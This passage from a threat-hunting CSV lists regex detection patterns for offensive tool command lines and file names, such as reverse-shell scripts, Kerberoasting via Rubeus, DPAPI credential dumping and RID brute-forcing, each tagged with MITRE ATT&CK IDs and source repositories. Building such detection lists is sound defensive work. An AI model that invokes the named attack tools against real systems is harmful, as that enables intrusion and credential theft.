by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rev_shell.py*",".{0,1000}\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "* -Reverse -IPAddress * -Port *",".{0,1000}\s\-Reverse\s\-IPAddress\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2703","579","2024-04-18T18:05:44Z","2021-02-27T00:53:13Z" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* reverse-index.nse*",".{0,1000}\sreverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* reverse-shellcode.cpp*",".{0,1000}\sreverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* revshell.py*",".{0,1000}\srevshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "* 
revshell32.bin*",".{0,1000}\srevshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* revshell64.bin*",".{0,1000}\srevshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* -RevToSelf *",".{0,1000}\s\-RevToSelf\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* rexec-brute.nse*",".{0,1000}\srexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfc868-time.nse*",".{0,1000}\srfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfs_injection.exe*",".{0,1000}\srfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -Rhost * -WARFile http*",".{0,1000}\s\-Rhost\s.{0,1000}\s\-WARFile\shttp.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Rhosts * -Password * -Directory * -Dictionary *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Password\s.{0,1000}\s\-Directory\s.{0,1000}\s\-Dictionary\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Rhosts * -Path *.txt -Port *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Path\s.{0,1000}\.txt\s\-Port\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* riak-http-info.nse*",".{0,1000}\sriak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rid_hijack.py*",".{0,1000}\srid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "* --rid-brute *",".{0,1000}\s\-\-rid\-brute\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --rid-brute 2>&1 *.txt*",".{0,1000}\s\-\-rid\-brute\s2\>\&1\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --rid-brute*",".{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* rid-hijack -*",".{0,1000}\srid\-hijack\s\-.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -rl 4 -ta 8 -t 2100 -an AS8560*",".{0,1000}\s\-rl\s4\s\-ta\s8\s\-t\s2100\s\-an\sAS8560.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* rlogin-brute.nse*",".{0,1000}\srlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rm_injection.exe*",".{0,1000}\srm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* rmi-dumpregistry.nse*",".{0,1000}\srmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-vuln-classloader.nse*",".{0,1000}\srmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rockyou.txt *",".{0,1000}\srockyou\.txt\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* RogueOxidResolver must be run remotely*",".{0,1000}\sRogueOxidResolver\smust\sbe\srun\sremotely.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* --rogue-smbserver-ip *",".{0,1000}\s\-\-rogue\-smbserver\-ip\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --rogue-smbserver-share *",".{0,1000}\s\-\-rogue\-smbserver\-share\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* ropbuffers.go*",".{0,1000}\sropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - 
TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* ropfuscator*",".{0,1000}\sropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "* rpcap-brute.nse*",".{0,1000}\srpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcap-info.nse*",".{0,1000}\srpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcdump.py*",".{0,1000}\srpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* rpc-grind.nse*",".{0,1000}\srpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcinfo.nse*",".{0,1000}\srpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsa-vuln-roca.nse*",".{0,1000}\srsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsync-brute.nse*",".{0,1000}\srsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsync-list-modules.nse*",".{0,1000}\srsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rt_hijacking.exe*",".{0,1000}\srt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* rtsp-methods.nse*",".{0,1000}\srtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-url-brute.nse*",".{0,1000}\srtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Rubeus -Command *kerberoast*",".{0,1000}\s\-Rubeus\s\-Command\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* ruler.exe*",".{0,1000}\sruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --rules:Jumbo *",".{0,1000}\s\-\-rules\:Jumbo\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* run 
donpapi*",".{0,1000}\srun\sdonpapi.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "* run netexec *",".{0,1000}\srun\snetexec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* run nxc smb *",".{0,1000}\srun\snxc\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* RunasCs.cs*",".{0,1000}\sRunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -runaslsass*",".{0,1000}\s\-runaslsass.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "* 
